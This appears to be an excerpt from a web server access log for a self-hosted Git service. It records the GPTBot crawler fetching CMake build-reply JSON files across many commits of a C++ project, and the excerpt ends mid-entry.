"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11602] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19999] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12870] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11630] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35755] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35757] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35754] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19971] [Gzip 9.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11120] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11632] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12795] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13747] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13746] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13751] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12795] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19999] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13621] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35754] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr 